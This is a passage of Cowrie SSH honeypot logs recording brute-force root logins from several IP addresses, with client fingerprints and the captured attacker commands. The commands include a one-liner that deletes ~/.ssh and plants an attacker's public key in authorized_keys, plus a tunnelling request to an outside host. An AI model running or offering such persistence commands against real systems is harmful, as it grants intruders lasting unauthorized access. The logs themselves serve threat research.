c-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.264977Z","src_ip":"212.227.125.160","session":"d8f950363d55"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.604075Z","src_ip":"212.227.125.160","session":"d8f950363d55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T02:12:41.717470Z","session":"d8f950363d55"}
{"eventid":"cowrie.session.connect","src_ip":"150.139.210.103","src_port":36524,"dst_ip":"1.2.3.4","dst_port":22,"session":"38e6f3bd80ff","protocol":"ssh","message":"New connection: 150.139.210.103:36524 (1.2.3.4:22) [session: 38e6f3bd80ff]","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.241766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.250311Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33182,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a44986cd0e0","protocol":"ssh","message":"New connection: 212.227.235.229:33182 (1.2.3.4:22) [session: 0a44986cd0e0]","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.309904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.311011Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.464292Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:02.590793Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.login.success","username":"root","password":"wjy123","message":"login attempt [root/wjy123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:13:03.332010Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Gc123123","message":"login attempt [root/Gc123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:13:03.748270Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:03.814577Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:03.815298Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:03.816422Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.041734Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:04.325346Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.326216Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.327428Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:04.528047Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.528906Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.608701Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.751367Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.752231Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.session.connect","src_ip":"150.139.210.103","src_port":37206,"dst_ip":"1.2.3.4","dst_port":22,"session":"320a6194ba27","protocol":"ssh","message":"New connection: 150.139.210.103:37206 (1.2.3.4:22) [session: 320a6194ba27]","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.965108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:04.971578Z","src_ip":"150.139.210.103","session":"320a6194ba27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.184744Z","src_ip":"150.139.210.103","session":"320a6194ba27"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:13:05.270770Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.271496Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.554269Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.555153Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49828,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf484dc9456","protocol":"ssh","message":"New connection: 212.227.235.229:49828 (1.2.3.4:22) [session: fcf484dc9456]","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.811223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:05.811977Z","src_ip":"212.227.235.229","session":"fcf484dc9456"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:13:06.041934Z","src_ip":"150.139.210.103","session":"320a6194ba27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:06.071452Z","src_ip":"212.227.235.229","session":"fcf484dc9456"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:13:07.150362Z","src_ip":"212.227.235.229","session":"fcf484dc9456"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:07.261194Z","src_ip":"150.139.210.103","session":"320a6194ba27"}
{"eventid":"cowrie.session.connect","src_ip":"150.139.210.103","src_port":37740,"dst_ip":"1.2.3.4","dst_port":22,"session":"c35ff267ae18","protocol":"ssh","message":"New connection: 150.139.210.103:37740 (1.2.3.4:22) [session: c35ff267ae18]","sensor":"my-vps","timestamp":"2025-08-26T02:13:07.472177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:07.473297Z","src_ip":"150.139.210.103","session":"c35ff267ae18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:07.685585Z","src_ip":"150.139.210.103","session":"c35ff267ae18"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.410735Z","src_ip":"212.227.235.229","session":"fcf484dc9456"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.585336Z","src_ip":"150.139.210.103","session":"c35ff267ae18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49836,"dst_ip":"1.2.3.4","dst_port":22,"session":"2171756f0ab8","protocol":"ssh","message":"New connection: 212.227.235.229:49836 (1.2.3.4:22) [session: 2171756f0ab8]","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.669878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.670902Z","src_ip":"212.227.235.229","session":"2171756f0ab8"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.807148Z","src_ip":"150.139.210.103","session":"38e6f3bd80ff"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.807959Z","src_ip":"150.139.210.103","session":"c35ff267ae18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:08.930432Z","src_ip":"212.227.235.229","session":"2171756f0ab8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:13:10.013512Z","src_ip":"212.227.235.229","session":"2171756f0ab8"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:10.274115Z","src_ip":"212.227.235.229","session":"0a44986cd0e0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:10.275383Z","src_ip":"212.227.235.229","session":"2171756f0ab8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:13:51.153328Z","src_ip":"212.227.125.160","session":"d8f950363d55"}
{"eventid":"cowrie.session.connect","src_ip":"103.81.85.71","src_port":56820,"dst_ip":"1.2.3.4","dst_port":22,"session":"66140f95c750","protocol":"ssh","message":"New connection: 103.81.85.71:56820 (1.2.3.4:22) [session: 66140f95c750]","sensor":"my-vps","timestamp":"2025-08-26T02:13:56.044246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:13:56.045134Z","src_ip":"103.81.85.71","session":"66140f95c750"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:13:56.288845Z","src_ip":"103.81.85.71","session":"66140f95c750"}
